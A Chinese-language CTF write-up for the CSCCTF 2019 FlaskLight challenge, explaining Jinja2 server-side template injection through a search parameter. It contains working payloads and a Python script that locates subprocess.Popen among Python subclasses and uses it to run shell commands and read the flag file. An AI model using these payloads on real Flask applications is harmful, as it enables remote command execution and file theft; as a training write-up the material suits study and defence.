CSCCTF 2019 QualFlaskLight

源码 get型 页面这边searched

159.PNG

160.PNG

那么应该就是通过?search传参

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
可以用到网站讲了ssti注入
先试一下是什么框架

161.PNG

jinja2框架

1
?search={{ ''.__class__.__mro__[2].__subclasses__() }}

显示所有的类

162.PNG

测试可用的类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://02e2317d-6141-483a-916e-7c9efd4d571d.node4.buuoj.cn:81/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except:
        continue
print("indexo of subprocess.Popen:" + str(index))
1
2
3
4
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/flasklight/coomme_geeeett_youur_flek").read() }}  (也可以用来读取flag)